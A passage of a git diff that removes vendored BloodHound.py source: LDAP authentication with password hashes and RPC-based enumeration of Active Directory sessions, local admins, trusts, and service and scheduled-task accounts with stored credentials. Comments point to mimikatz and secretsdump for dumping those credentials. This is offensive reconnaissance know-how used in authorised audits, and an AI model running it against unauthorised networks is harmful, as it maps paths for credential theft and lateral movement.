COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER -# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, -# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE -# SOFTWARE. -# -#################### diff --git a/external/bloodhound/ad/authentication.py b/external/bloodhound/ad/authentication.py deleted file mode 100755 index c7770bd..0000000 --- a/external/bloodhound/ad/authentication.py +++ /dev/null @@ -1,89 +0,0 @@ -#################### -# -# Copyright (c) 2018 Fox-IT -# -# Permission is hereby granted, free of charge, to any person obtaining a copy -# of this software and associated documentation files (the "Software"), to deal -# in the Software without restriction, including without limitation the rights -# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell -# copies of the Software, and to permit persons to whom the Software is -# furnished to do so, subject to the following conditions: -# -# The above copyright notice and this permission notice shall be included in all -# copies or substantial portions of the Software. -# -# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR -# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, -# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE -# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER -# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, -# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE -# SOFTWARE. -# -#################### - -import logging -from ldap3 import Server, Connection, NTLM, ALL -from ldap3.core.results import RESULT_STRONGER_AUTH_REQUIRED - -""" -Active Directory authentication helper -""" -class ADAuthentication(object): - def __init__(self, username='', password='', domain='', - lm_hash='', nt_hash='', aes_key='', kdc=None): - self.username = username - self.domain = domain - if '@' in self.username: - self.username, self.domain = self.username.rsplit('@', 1) - self.password = password - self.lm_hash = lm_hash - self.nt_hash = nt_hash - self.aes_key = aes_key - self.kdc = kdc - - - def getLDAPConnection(self, hostname='', baseDN='', protocol='ldaps', gc=False): - if gc: - # Global Catalog connection - if protocol == 'ldaps': - # Ldap SSL - server = Server("%s://%s:3269" % (protocol, hostname), get_info=ALL) - else: - # Plain LDAP - server = Server("%s://%s:3268" % (protocol, hostname), get_info=ALL) - else: - server = Server("%s://%s" % (protocol, hostname), get_info=ALL) - # ldap3 supports auth with the NT hash. LM hash is actually ignored since only NTLMv2 is used. - if self.nt_hash != '': - ldappass = self.lm_hash + ':' + self.nt_hash - else: - ldappass = self.password - #ldaplogin = '%s\\%s' % (self.domain, self.username) - ldaplogin = '%s@%s' % (self.username, self.domain) - #conn = Connection(server, user=ldaplogin, auto_referrals=False, password=ldappass, authentication=NTLM) - conn = Connection(server, user=ldaplogin, auto_referrals=False, password=ldappass) - - # TODO: Kerberos auth for ldap - if self.kdc is not None: - logging.error('Kerberos login is not yet supported!') - # try: - # logging.debug('Authenticating to LDAP server using Kerberos') - # conn.kerberosLogin(self.username, self.password, self.domain, - # self.lm_hash, self.nt_hash, self.aes_key, - # self.kdc) - # except KerberosError as e: - # logging.warning('Kerberos login failed: %s' % e) - # return None - else: - logging.debug('Authenticating to LDAP server') - if not conn.bind(): - result = conn.result - if result['result'] == RESULT_STRONGER_AUTH_REQUIRED and protocol == 'ldap': - logging.warning('LDAP Authentication is refused because LDAP signing is enabled. ' - 'Trying to connect over LDAPS instead...') - return self.getLDAPConnection(hostname, baseDN, 'ldaps') - else: - logging.error('Failure to authenticate with LDAP! Error %s' % result['message']) - return None - return conn diff --git a/external/bloodhound/ad/computer.py b/external/bloodhound/ad/computer.py deleted file mode 100755 index 4cd7ff6..0000000 --- a/external/bloodhound/ad/computer.py +++ /dev/null @@ -1,655 +0,0 @@ -#################### -# -# Copyright (c) 2018 Fox-IT -# -# Permission is hereby granted, free of charge, to any person obtaining a copy -# of this software and associated documentation files (the "Software"), to deal -# in the Software without restriction, including without limitation the rights -# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell -# copies of the Software, and to permit persons to whom the Software is -# furnished to do so, subject to the following conditions: -# -# The above copyright notice and this permission notice shall be included in all -# copies or substantial portions of the Software. -# -# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR -# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, -# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE -# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER -# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, -# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE -# SOFTWARE. -# -#################### - -import logging -import traceback -from impacket.dcerpc.v5 import transport, samr, srvs, lsat, lsad, nrpc, wkst, scmr, tsch -from impacket.dcerpc.v5.rpcrt import DCERPCException, RPC_C_AUTHN_LEVEL_PKT_INTEGRITY, RPC_C_AUTHN_LEVEL_PKT_PRIVACY -from impacket.dcerpc.v5.ndr import NULL -from impacket.dcerpc.v5.dtypes import RPC_SID, MAXIMUM_ALLOWED -from impacket import smb3structs -from .utils import ADUtils, AceResolver -from . .enumeration.acls import parse_binary_acl -from impacket.smb3 import SMB3 -from impacket.smb import SMB -# Try to import exceptions here, if this does not succeed, then impacket version is too old -try: - HostnameValidationExceptions = (SMB3.HostnameValidationException, SMB.HostnameValidationException) -except AttributeError: - HostnameValidationExceptions = () - -class ADComputer(object): - """ - Computer connected to Active Directory - """ - def __init__(self, hostname=None, samname=None, ad=None, addc=None, objectsid=None): - self.hostname = hostname - self.ad = ad - self.addc = addc - self.samname = samname - self.rpc = None - self.dce = None - self.admins = [] - self.dcom = [] - self.rdp = [] - self.psremote = [] - self.trusts = [] - self.services = [] - self.sessions = [] - self.addr = None - self.smbconnection = None - # The SID of the local domain - self.sid = None - # The SID within the domain - self.objectsid = objectsid - self.primarygroup = None - if addc: - self.aceresolver = AceResolver(ad, ad.objectresolver) - # Did connecting to this host fail before? - self.permanentfailure = False - - def get_bloodhound_data(self, entry, collect, skip_acl=False): - data = { - 'ObjectIdentifier': self.objectsid, - 'AllowedToAct': [], - 'PrimaryGroupSid': self.primarygroup, - 'LocalAdmins': self.admins, - 'PSRemoteUsers': self.psremote, - 'Properties': { - 'name': self.hostname.upper(), - 'objectid': self.objectsid, - 'domain': self.ad.domain.upper(), - 'highvalue': False, - 'distinguishedname': ADUtils.get_entry_property(entry, 'distinguishedName') - }, - 'RemoteDesktopUsers': self.rdp, - 'DcomUsers': self.dcom, - 'AllowedToDelegate': [], - 'Sessions': self.sessions, - 'Aces': [] - } - props = data['Properties'] - # via the TRUSTED_FOR_DELEGATION (0x00080000) flag in UAC - props['unconstraineddelegation'] = ADUtils.get_entry_property(entry, 'userAccountControl', default=0) & 0x00080000 == 0x00080000 - props['enabled'] = ADUtils.get_entry_property(entry, 'userAccountControl', default=0) & 2 == 0 - - if 'objectprops' in collect or 'acl' in collect: - props['haslaps'] = ADUtils.get_entry_property(entry, 'ms-mcs-admpwdexpirationtime', 0) != 0 - - if 'objectprops' in collect: - props['lastlogontimestamp'] = ADUtils.win_timestamp_to_unix( - ADUtils.get_entry_property(entry, 'lastlogontimestamp', default=0, raw=True) - ) - props['pwdlastset'] = ADUtils.win_timestamp_to_unix( - ADUtils.get_entry_property(entry, 'pwdLastSet', default=0, raw=True) - ) - props['serviceprincipalnames'] = ADUtils.get_entry_property(entry, 'servicePrincipalName', []) - props['description'] = ADUtils.get_entry_property(entry, 'description') - props['operatingsystem'] = ADUtils.get_entry_property(entry, 'operatingSystem') - # Add SP to OS if specified - servicepack = ADUtils.get_entry_property(entry, 'operatingSystemServicePack') - if servicepack: - props['operatingsystem'] = '%s %s' % (props['operatingsystem'], servicepack) - - delegatehosts = ADUtils.get_entry_property(entry, 'msDS-AllowedToDelegateTo', []) - for host in delegatehosts: - try: - target = host.split('/')[1] - except IndexError: - logging.warning('Invalid delegation target: %s', host) - continue - try: - sid = self.ad.computersidcache.get(target.lower()) - data['AllowedToDelegate'].append(sid) - except KeyError: - if '.' in target: - data['AllowedToDelegate'].append(target.upper()) - if len(delegatehosts) > 0: - props['allowedtodelegate'] = delegatehosts - - # Process resource-based constrained delegation - _, aces = parse_binary_acl(data, - 'computer', - ADUtils.get_entry_property(entry, - 'msDS-AllowedToActOnBehalfOfOtherIdentity', - raw=True), - self.addc.objecttype_guid_map) - outdata = self.aceresolver.resolve_aces(aces) - for delegated in outdata: - if delegated['RightName'] == 'Owner': - continue - if delegated['RightName'] == 'GenericAll': - data['AllowedToAct'].append({'MemberId': delegated['PrincipalSID'], 'MemberType': delegated['PrincipalType']}) - - # Run ACL collection if this was not already done centrally - if 'acl' in collect and not skip_acl: - _, aces = parse_binary_acl(data, - 'computer', - ADUtils.get_entry_property(entry, - 'nTSecurityDescriptor', - raw=True), - self.addc.objecttype_guid_map) - # Parse aces - data['Aces'] = self.aceresolver.resolve_aces(aces) - - return data - - def try_connect(self): - addr = None - try: - addr = self.ad.dnscache.get(self.hostname) - except KeyError: - try: - q = self.ad.dnsresolver.query(self.hostname, 'A', tcp=self.ad.dns_tcp) - for r in q: - addr = r.address - - if addr == None: - return False - # Do exit properly on keyboardinterrupts - except KeyboardInterrupt: - raise - except Exception as e: - # Doesn't exist - if "None of DNS query names exist" in str(e): - logging.info('Skipping enumeration for %s since it could not be resolved.', self.hostname) - else: - logging.warning('Could not resolve: %s: %s', self.hostname, e) - return False - - logging.debug('Resolved: %s' % addr) - - self.ad.dnscache.put(self.hostname, addr) - - self.addr = addr - - logging.debug('Trying connecting to computer: %s', self.hostname) - # We ping the host here, this adds a small overhead for setting up an extra socket - # but saves us from constructing RPC Objects for non-existing hosts. Also RPC over - # SMB does not support setting a connection timeout, so we catch this here. - if ADUtils.tcp_ping(addr, 445) is False: - return False - return True - - - def dce_rpc_connect(self, binding, uuid, integrity=False): - if self.permanentfailure: - logging.debug('Skipping connection because of previous failure') - return None - logging.debug('DCE/RPC binding: %s', binding) - - try: - self.rpc = transport.DCERPCTransportFactory(binding) - self.rpc.set_connect_timeout(1.0) - if hasattr(self.rpc, 'set_credentials'): - self.rpc.set_credentials(self.ad.auth.username, self.ad.auth.password, - domain=self.ad.auth.domain, - lmhash=self.ad.auth.lm_hash, - nthash=self.ad.auth.nt_hash, - aesKey=self.ad.auth.aes_key) - - # Use strict validation if possible - if hasattr(self.rpc, 'set_hostname_validation'): - self.rpc.set_hostname_validation(True, False, self.hostname) - - # TODO: check Kerberos support - # if hasattr(self.rpc, 'set_kerberos'): - # self.rpc.set_kerberos(True, self.ad.auth.kdc) - # Uncomment to force SMB2 (especially for development to prevent encryption) - # will break clients only supporting SMB1 ofc - # self.rpc.preferred_dialect(smb3structs.SMB2_DIALECT_21) - - # Re-use the SMB connection if possible - if self.smbconnection: - self.rpc.set_smb_connection(self.smbconnection) - dce = self.rpc.get_dce_rpc() - - # Some interfaces require integrity (such as scheduled tasks) - # others don't support it at all and error out. - if integrity: - dce.set_auth_level(RPC_C_AUTHN_LEVEL_PKT_INTEGRITY) - - # Try connecting, catch hostname validation - try: - dce.connect() - except HostnameValidationExceptions as exc: - logging.info('Ignoring host %s since its hostname does not match: %s', self.hostname, str(exc)) - self.permanentfailure = True - return None - - if self.smbconnection is None: - self.smbconnection = self.rpc.get_smb_connection() - # We explicity set the smbconnection back to the rpc object - # this way it won't be closed when we call disconnect() - self.rpc.set_smb_connection(self.smbconnection) - - # Hostname validation - authname = self.smbconnection.getServerName() - if authname.lower() != self.hostname.split('.')[0].lower(): - logging.info('Ignoring host %s since its reported name %s does not match', self.hostname, authname) - self.permanentfailure = True - return None - -# Implement encryption? -# dce.set_auth_level(NTLM_AUTH_PKT_PRIVACY) - dce.bind(uuid) - except DCERPCException as e: - logging.debug(traceback.format_exc()) - logging.warning('DCE/RPC connection failed: %s', str(e)) - return None - except KeyboardInterrupt: - raise - except Exception as e: - logging.debug(traceback.format_exc()) - logging.warning('DCE/RPC connection failed: %s', e) - return None - except: - logging.warning('DCE/RPC connection failed (unknown error)') - return None - - return dce - - def rpc_get_loggedon(self): - """ - Query logged on users via RPC. - Requires admin privs - """ - binding = r'ncacn_np:%s[\PIPE\wkssvc]' % self.addr - loggedonusers = set() - dce = self.dce_rpc_connect(binding, wkst.MSRPC_UUID_WKST) - if dce is None: - logging.warning('Connection failed: %s', binding) - return - try: - # 1 means more detail, including the domain - resp = wkst.hNetrWkstaUserEnum(dce, 1) - for record in resp['UserInfo']['WkstaUserInfo']['Level1']['Buffer']: - # Skip computer accounts - if record['wkui1_username'][-2] == '$': - continue - # Skip sessions for local accounts - if record['wkui1_logon_domain'][:-1].upper() == self.samname.upper(): - continue - domain = record['wkui1_logon_domain'][:-1].upper() - domain_entry = self.ad.get_domain_by_name(domain) - if domain_entry is not None: - domain = ADUtils.ldap2domain(domain_entry['attributes']['distinguishedName']) - logging.debug('Found logged on user at %s: %s@%s' % (self.hostname, record['wkui1_username'][:-1], domain)) - loggedonusers.add((record['wkui1_username'][:-1], domain)) - except DCERPCException as e: - if 'rpc_s_access_denied' in str(e): - logging.debug('Access denied while enumerating LoggedOn on %s, probably no admin privs', self.hostname) - else: - logging.debug('Exception connecting to RPC: %s', e) - except Exception as e: - if 'connection reset' in str(e): - logging.debug('Connection was reset: %s', e) - else: - raise e - - dce.disconnect() - return list(loggedonusers) - - def rpc_close(self): - if self.smbconnection: - self.smbconnection.logoff() - - def rpc_get_sessions(self): - binding = r'ncacn_np:%s[\PIPE\srvsvc]' % self.addr - - dce = self.dce_rpc_connect(binding, srvs.MSRPC_UUID_SRVS) - - if dce is None: - return - - try: - resp = srvs.hNetrSessionEnum(dce, '\x00', NULL, 10) - except DCERPCException as e: - if 'rpc_s_access_denied' in str(e): - logging.debug('Access denied while enumerating Sessions on %s, likely a patched OS', self.hostname) - return [] - else: - raise - except Exception as e: - if str(e).find('Broken pipe') >= 0: - return - else: - raise - - sessions = [] - - for session in resp['InfoStruct']['SessionInfo']['Level10']['Buffer']: - userName = session['sesi10_username'][:-1] - ip = session['sesi10_cname'][:-1] - # Strip \\ from IPs - if ip[:2] == '\\\\': - ip = ip[2:] - # Skip empty IPs - if ip == '': - continue - # Skip our connection - if userName == self.ad.auth.username: - continue - # Skip empty usernames - if len(userName) == 0: - continue - # Skip machine accounts - if userName[-1] == '$': - continue - # Skip local connections - if ip in ['127.0.0.1', '[::1]']: - continue - # IPv6 address - if ip[0] == '[' and ip[-1] == ']': - ip = ip[1:-1] - - logging.info('User %s is logged in on %s from %s' % (userName, self.hostname, ip)) - - sessions.append({'user': userName, 'source': ip, 'target': self.hostname}) - - dce.disconnect() - - return sessions - - """ - """ - def rpc_get_domain_trusts(self): - binding = r'ncacn_np:%s[\PIPE\netlogon]' % self.addr - - dce = self.dce_rpc_connect(binding, nrpc.MSRPC_UUID_NRPC) - - if dce is None: - return - - try: - req = nrpc.DsrEnumerateDomainTrusts() - req['ServerName'] = NULL - req['Flags'] = 1 - resp = dce.request(req) - except Exception as e: - raise e - - for domain in resp['Domains']['Domains']: - logging.info('Found domain trust from %s to %s', self.hostname, domain['NetbiosDomainName']) - self.trusts.append({'domain': domain['DnsDomainName'], - 'type': domain['TrustType'], - 'flags': domain['Flags']}) - - dce.disconnect() - - - def rpc_get_services(self): - """ - Query services with stored credentials via RPC. - These credentials can be dumped with mimikatz via lsadump::secrets or via secretsdump.py - """ - binding = r'ncacn_np:%s[\PIPE\svcctl]' % self.addr - serviceusers = [] - dce = self.dce_rpc_connect(binding, scmr.MSRPC_UUID_SCMR) - if dce is None: - return - try: - resp = scmr.hROpenSCManagerW(dce) - scManagerHandle = resp['lpScHandle'] - # TODO: Figure out if filtering out service types makes sense - resp = scmr.hREnumServicesStatusW(dce, - scManagerHandle, - dwServiceType=scmr.SERVICE_WIN32_OWN_PROCESS, - dwServiceState=scmr.SERVICE_STATE_ALL) - # TODO: Skip well-known services to save on traffic - for i in range(len(resp)): - try: - ans = scmr.hROpenServiceW(dce, scManagerHandle, resp[i]['lpServiceName'][:-1]) - serviceHandle = ans['lpServiceHandle'] - svcresp = scmr.hRQueryServiceConfigW(dce, serviceHandle) - svc_user = svcresp['lpServiceConfig']['lpServiceStartName'][:-1] - if '@' in svc_user: - logging.info("Found user service: %s running as %s on %s", - resp[i]['lpServiceName'][:-1], - svc_user, - self.hostname) - serviceusers.append(svc_user) - except DCERPCException as e: - if 'rpc_s_access_denied' not in str(e): - logging.debug('Exception querying service %s via RPC: %s', resp[i]['lpServiceName'][:-1], e) - except DCERPCException as e: - logging.debug('Exception connecting to RPC: %s', e) - except Exception as e: - if 'connection reset' in str(e): - logging.debug('Connection was reset: %s', e) - else: - raise e - - dce.disconnect() - return serviceusers - - - def rpc_get_schtasks(self): - """ - Query the scheduled tasks via RPC. Requires admin privileges. - These credentials can be dumped with mimikatz via vault::cred - """ - # Blacklisted folders (Default ones) - blacklist = [u'Microsoft\x00'] - # Start with the root folder - folders = ['\\'] - tasks = [] - schtaskusers = [] - binding = r'ncacn_np:%s[\PIPE\atsvc]' % self.addr - try: - dce = self.dce_rpc_connect(binding, tsch.MSRPC_UUID_TSCHS, True) - if dce is None: - return - # Get root folder - resp = tsch.hSchRpcEnumFolders(dce, '\\') - for item in resp['pNames']: - data = item['Data'] - if data not in blacklist: - folders.append('\\'+data) - - # Enumerate the folders we found - # subfolders not supported yet - for folder in folders: - try: - resp = tsch.hSchRpcEnumTasks(dce, folder) - for item in resp['pNames']: - data = item['Data'] - if folder != '\\': - # Make sure to strip the null byte - tasks.append(folder[:-1]+'\\'+data) - else: - tasks.append(folder+data) - except DCERPCException as e: - logging.debug('Error enumerating task folder %s: %s', folder, e) - for task in tasks: - try: - resp = tsch.hSchRpcRetrieveTask(dce, task) - # This returns a tuple (sid, logontype) or None - userinfo = ADUtils.parse_task_xml(resp['pXml']) - if userinfo: - if userinfo[1] == u'Password': - # Convert to byte string because our cache format is in bytes - schtaskusers.append(str(userinfo[0])) - logging.info('Found scheduled task %s on %s with stored credentials for SID %s', - task, - self.hostname, - userinfo[0]) - except DCERPCException as e: - logging.debug('Error querying task %s: %s', task, e) - except DCERPCException as e: - logging.debug('Exception enumerating scheduled tasks: %s', e) - - dce.disconnect() - return schtaskusers - - - """ - This magic is mostly borrowed from impacket/examples/netview.py - """ - def rpc_get_group_members(self, group_rid, resultlist): - binding = r'ncacn_np:%s[\PIPE\samr]' % self.addr - unresolved = [] - dce = self.dce_rpc_connect(binding, samr.MSRPC_UUID_SAMR) - - if dce is None: - return - - try: - resp = samr.hSamrConnect(dce) - serverHandle = resp['ServerHandle'] - # Attempt to get the SID from this computer to filter local accounts later - try: - resp = samr.hSamrLookupDomainInSamServer(dce, serverHandle, self.samname[:-1]) - self.sid = resp['DomainId'].formatCanonical() - # This doesn't always work (for example on DCs) - except DCERPCException as e: - # Make it a string which is guaranteed not to match a SID - self.sid = 'UNKNOWN' - - - # Enumerate the domains known to this computer - resp = samr.hSamrEnumerateDomainsInSamServer(dce, serverHandle) - domains = resp['Buffer']['Buffer'] - - # Query the builtin domain (derived from this SID) - sid = RPC_SID() - sid.fromCanonical('S-1-5-32') - - logging.debug('Opening domain handle') - # Open a handle to this domain - resp = samr.hSamrOpenDomain(dce, - serverHandle=serverHandle, - desiredAccess=samr.DOMAIN_LOOKUP | MAXIMUM_ALLOWED, - domainId=sid) - domainHandle = resp['DomainHandle'] - try: - resp = samr.hSamrOpenAlias(dce, - domainHandle, - desiredAccess=samr.ALIAS_LIST_MEMBERS | MAXIMUM_ALLOWED, - aliasId=group_rid) - except samr.DCERPCSessionError as error: - # Group does not exist - if 'STATUS_NO_SUCH_ALIAS' in str(error): - logging.debug('No group with RID %d exists', group_rid) - return - resp = samr.hSamrGetMembersInAlias(dce, - aliasHandle=resp['AliasHandle']) - for member in resp['Members']['Sids']: - sid_string = member['SidPointer'].formatCanonical() - - logging.debug('Found %d SID: %s', group_rid, sid_string) - if not sid_string.startswith(self.sid): - # If the sid is known, we can add the admin value directly - try: - siddata = self.ad.sidcache.get(sid_string) - if siddata is None: - unresolved.append(sid_string) - else: - logging.debug('Sid is cached: %s', siddata['principal']) - resultlist.append({'MemberId': sid_string, - 'MemberType': siddata['type'].capitalize()}) - except KeyError: - # Append it to the list of unresolved SIDs - unresolved.append(sid_string) - else: - logging.debug('Ignoring local group %s', sid_string) - except DCERPCException as e: - if 'rpc_s_access_denied' in str(e): - logging.debug('Access denied while enumerating groups on %s, likely a patched OS', self.hostname) - else: - raise - except Exception as e: - if 'connection reset' in str(e): - logging.debug('Connection was reset: %s', e) - else: - raise e - - dce.disconnect() - return unresolved - - - def rpc_resolve_sids(self, sids, resultlist): - """ - Resolve any remaining unknown SIDs for local accounts. - """ - # If all sids were already cached, we can just return - if sids is None or len(sids) == 0: - return - binding = r'ncacn_np:%s[\PIPE\lsarpc]' % self.addr - - dce = self.dce_rpc_connect(binding, lsat.MSRPC_UUID_LSAT) - - if dce is None: - return - - try: - resp = lsad.hLsarOpenPolicy2(dce, lsat.POLICY_LOOKUP_NAMES | MAXIMUM_ALLOWED) - except Exception as e: - if str(e).find('Broken pipe') >= 0: - return - else: - raise - - policyHandle = resp['PolicyHandle'] - - # We could look up the SIDs all at once, but if not all SIDs are mapped, we don't know which - # ones were resolved and which not, making it impossible to map them in the cache. - # Therefor we use more SAMR calls at the start, but after a while most SIDs will be reliable - # in our cache and this function doesn't even need to get called anymore. - for sid_string in sids: - try: - resp = lsat.hLsarLookupSids(dce, policyHandle, [sid_string], lsat.LSAP_LOOKUP_LEVEL.enumItems.LsapLookupWksta) - except DCERPCException as e: - if str(e).find('STATUS_NONE_MAPPED') >= 0: - logging.warning('SID %s lookup failed, return status: STATUS_NONE_MAPPED', sid_string) - # Try next SID - continue - elif str(e).find('STATUS_SOME_NOT_MAPPED') >= 0: - # Not all could be resolved, work with the ones that could - resp = e.get_packet() - else: - raise - - domains = [] - for entry in resp['ReferencedDomains']['Domains']: - domains.append(entry['Name']) - - for entry in resp['TranslatedNames']['Names']: - domain = domains[entry['DomainIndex']] - domain_entry = self.ad.get_domain_by_name(domain) - if domain_entry is not None: - domain = ADUtils.ldap2domain(domain_entry['attributes']['distinguishedName']) - # TODO: what if it isn't? Should we fall back to LDAP? - - if entry['Name'] != '': - resolved_entry = ADUtils.resolve_sid_entry(entry, domain) - logging.debug('Resolved SID to name: %s', resolved_entry['principal']) - resultlist.append({'MemberId': sid_string, - 'MemberType': resolved_entry['type'].capitalize()}) - # Add it to our cache - self.ad.sidcache.put(sid_string, resolved_entry) - else: - logging.warning('Resolved name is empty [%s]', entry) - - dce.disconnect() diff --git a/external/bloodhound/ad/domain.py b/external/bloodhound/ad/domain.py deleted file mode 100755 index 5e052cb..0000000 --- a/external/bloodhound/ad/domain.py +++ /dev/null @@ -1,578 +0,0 @@ -#################### -# -# Copyright (c) 2018 Fox-IT -# -# Permission is hereby granted, free of charge, to any person obtaining a copy -# of this software and associated documentation files (the "Software"), to deal -# in the Software without restriction, including without limitation the rights -# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell -# copies of the Software, and to permit persons to whom the Software is -# furnished to do so, subject to the following conditions: -# -# The above copyright notice and this permission notice shall be included in all -# copies or substantial portions of the Software. -# -# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR -# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, -# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE -# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER -# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, -# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE -# SOFTWARE. -# -#################### -from __future__ import unicode_literals -import logging -import traceback - -from uuid import UUID -from dns import resolver -from ldap3 import ALL_ATTRIBUTES, BASE -from ldap3.utils.config import _ATTRIBUTES_EXCLUDED_FROM_CHECK -from ldap3.core.exceptions import LDAPKeyError, LDAPAttributeError, LDAPCursorError, LDAPNoSuchObjectResult, LDAPSocketOpenError -from ldap3.protocol.microsoft import security_descriptor_control -# from impacket.krb5.kerberosv5 import KerberosError -from .utils import ADUtils, DNSCache, SidCache, SamCache -from .computer import ADComputer -from . .enumeration.objectresolver import ObjectResolver -from future.utils import itervalues, iteritems, native_str - -""" -Active Directory Domain Controller -""" -class ADDC(ADComputer): - def __init__(self, hostname=None, ad=None): - ADComputer.__init__(self, hostname) - self.ad = ad - # Primary LDAP connection - self.ldap = None - # Secondary LDAP connection - self.resolverldap = None - # GC LDAP connection - self.gcldap = None - # Initialize GUID map - self.objecttype_guid_map = None - - # 2020-03-10: Changed `protocol='ldaps'` from `protocol='ldap'` - def ldap_connect(self, protocol='ldaps', resolver=False): - """ - Connect to the LDAP service - """ - logging.info('Connecting to LDAP server: %s' % self.hostname) - - # Convert the hostname to an IP, this prevents ldap3 from doing it - # which doesn't use our custom nameservers - q = self.ad.dnsresolver.query(self.hostname, tcp=self.ad.dns_tcp) - for r in q: - ip = r.address - try: - ldap = self.ad.auth.getLDAPConnection(hostname=ip, - baseDN=self.ad.baseDN, protocol=protocol) - - except LDAPSocketOpenError: - # It didnt like ldaps, try ldap - ldap = self.ad.auth.getLDAPConnection(hostname=ip, - baseDN=self.ad.baseDN, protocol='ldap') - - if resolver: - self.resolverldap = ldap - else: - self.ldap = ldap - return ldap is not None - - # 2020-03-10: Changed `protocol='ldaps'` from `protocol='ldap'` - def gc_connect(self, protocol='ldaps'): - """ - Connect to the global catalog - """ - if self.hostname in self.ad.gcs(): - # This server is a Global Catalog - initial_server = self.hostname - else: - # Pick the first GC server - try: - initial_server = self.ad.gcs()[0] - except IndexError: - # TODO: implement fallback options for GC detection? - logging.error('Could not find a Global Catalog in this domain!'\ - ' Resolving will be unreliable in forests with multiple domains') - return False - try: - # Convert the hostname to an IP, this prevents ldap3 from doing it - # which doesn't use our custom nameservers - logging.info('Connecting to GC LDAP server: %s' % initial_server) - q = self.ad.dnsresolver.query(initial_server, tcp=self.ad.dns_tcp) - for r in q: - ip = r.address - except (resolver.NXDOMAIN, resolver.Timeout): - for server in self.ad.gcs(): - # Skip the one we already tried - if server == initial_server: - continue - try: - # Convert the hostname to an IP, this prevents ldap3 from doing it - # which doesn't use our custom nameservers - logging.info('Connecting to GC LDAP server: %s' % server) - q = self.ad.dnsresolver.query(server, tcp=self.ad.dns_tcp) - for r in q: - ip = r.address - break - except (resolver.NXDOMAIN, resolver.Timeout): - continue - - try: - self.gcldap = self.ad.auth.getLDAPConnection(hostname=ip, gc=True, - baseDN=self.ad.baseDN, protocol=protocol) - except LDAPSocketOpenError: - # It didnt like ldaps, try ldap - self.gcldap = self.ad.auth.getLDAPConnection(hostname=ip, gc=True, - baseDN=self.ad.baseDN, protocol='ldap') - - return self.gcldap is not None - - def search(self, search_filter='(objectClass=*)', attributes=None, search_base=None, generator=True, use_gc=False, use_resolver=False, query_sd=False): - """ - Search for objects in LDAP or Global Catalog LDAP. - """ - if self.ldap is None: - self.ldap_connect() - if search_base is None: - search_base = self.ad.baseDN - if attributes is None or attributes == []: - attributes = ALL_ATTRIBUTES - if query_sd: - # Set SD flags to only query for DACL and Owner - controls = security_descriptor_control(sdflags=0x05) - else: - controls = None - # Use the GC if this is requested - if use_gc: - searcher = self.gcldap - else: - # If this request comes from the resolver thread, use that - if use_resolver: - searcher = self.resolverldap - else: - searcher = self.ldap - - sresult = searcher.extend.standard.paged_search(search_base, - search_filter, - attributes=attributes, - paged_size=200, - controls=controls, - generator=generator) - try: - # Use a generator for the result regardless of if the search function uses one - for e in sresult: - if e['type'] != 'searchResEntry': - continue - yield e - except LDAPNoSuchObjectResult: - # This may indicate the object doesn't exist or access is denied - logging.warning('LDAP Server reported that the search in %s for %s does not exist.', search_base, search_filter) - - def ldap_get_single(self, qobject, attributes=None, use_gc=False, use_resolver=False): - """ - Get a single object, requires full DN to object. - This function supports searching both in the local directory and the Global Catalog. - The connection to the GC should already be established before calling this function. - """ - if use_gc: - searcher = self.gcldap - else: - # If this request comes from the resolver thread, use that - if use_resolver: - searcher = self.resolverldap - else: - searcher = self.ldap - if attributes is None or attributes == []: - attributes = ALL_ATTRIBUTES - try: - sresult = searcher.extend.standard.paged_search(qobject, - '(objectClass=*)', - search_scope=BASE, - attributes=attributes, - paged_size=10, - generator=False) - except LDAPNoSuchObjectResult: - # This may indicate the object doesn't exist or access is denied - logging.warning('LDAP Server reported that the object %s does not exist.', qobject) - return None - for e in sresult: - if e['type'] != 'searchResEntry': - continue - return e - - def get_domain_controllers(self): - entries = self.search('(userAccountControl:1.2.840.113556.1.4.803:=8192)', - ['dnshostname', 'samaccounttype', 'samaccountname', - 'serviceprincipalname', 'objectSid']) - - return entries - - - def get_netbios_name(self, context): - try: - entries = self.search('(ncname=%s)' % context, - ['nETBIOSName'], - search_base="CN=Partitions,%s" % self.ldap.server.info.other['configurationNamingContext'][0]) - except (LDAPAttributeError, LDAPCursorError) as e: - logging.warning('Could not determine NetBiosname of the domain: %s', str(e)) - return next(entries) - - def get_objecttype(self): - """ - Function to get objecttype GUID - """ - self.objecttype_guid_map = dict() - - if self.ldap is None: - self.ldap_connect() - - sresult = self.ldap.extend.standard.paged_search(self.ldap.server.info.other['schemaNamingContext'][0], - 